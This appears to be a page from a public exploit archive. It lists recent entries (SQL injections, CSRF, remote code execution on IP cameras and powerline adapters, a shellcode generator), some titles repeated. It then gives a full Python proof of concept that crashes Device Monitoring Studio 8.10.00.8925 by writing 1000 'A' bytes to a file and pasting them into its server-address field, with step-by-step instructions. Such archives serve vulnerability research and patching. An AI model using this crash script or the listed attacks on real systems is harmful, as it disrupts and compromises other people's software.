
11 changes to exploits/shellcodes Device Monitoring Studio 8.10.00.8925 - Denial of Service (PoC) River Past Audio Converter 7.7.16 - Denial of Service (PoC) ResourceSpace 8.6 - 'watched_searches.php' SQL Injection SuiteCRM 7.10.7 - 'parentTab' SQL Injection SuiteCRM 7.10.7 - 'record' SQL Injection ResourceSpace 8.6 - 'watched_searches.php' SQL Injection SuiteCRM 7.10.7 - 'parentTab' SQL Injection SuiteCRM 7.10.7 - 'record' SQL Injection BEWARD N100 H.264 VGA IP Camera M2.1.6 - RTSP Stream Disclosure BEWARD N100 H.264 VGA IP Camera M2.1.6 - Cross-Site Request Forgery (Add Admin) BEWARD N100 H.264 VGA IP Camera M2.1.6 - Remote Code Execution BEWARD N100 H.264 VGA IP Camera M2.1.6 - Arbitrary File Disclosure devolo dLAN 550 duo+ Starter Kit - Cross-Site Request Forgery devolo dLAN 550 duo+ Starter Kit - Remote Code Execution Zyxel VMG3312-B10B DSL-491HNU-B1B v2 Modem - Cross-Site Request Forgery OpenMRS Platform < 2.24.0 - Insecure Object Deserialization Linux/x86 - Random Insertion Encoder and Decoder Shellcode (Generator)
20 lines
No EOL
621 B
Python
Executable file
20 lines
No EOL
621 B
Python
Executable file
#Exploit Title: Device Monitoring Studio 8.10.00.8925 - Denial of Service (PoC)
|
|
#Discovery by: Victor Mondragón
|
|
#Discovery Date: 2019-02-04
|
|
#Tested Version: 8.10.00.8925
|
|
#Tested on: Windows 7 Service Pack 1 x64
|
|
|
|
#Steps to produce the crash:
|
|
#1.- Run python code: Device_Monitoring_Studio_8.10.00.8925.py
|
|
#2.- Open code.txt and copy content to clipboard
|
|
#3.- Open Device Monitoring Studio
|
|
#4.- Select "Tools" > "Connect to New Server"
|
|
#5.- Select "Enter the name server or address" and Paste Clipboard
|
|
#6.- Select "Ok"
|
|
#7.- Crashed
|
|
|
|
cod = "\x41" * 1000
|
|
|
|
f = open('code.txt', 'w')
|
|
f.write(cod)
|
|
f.close() |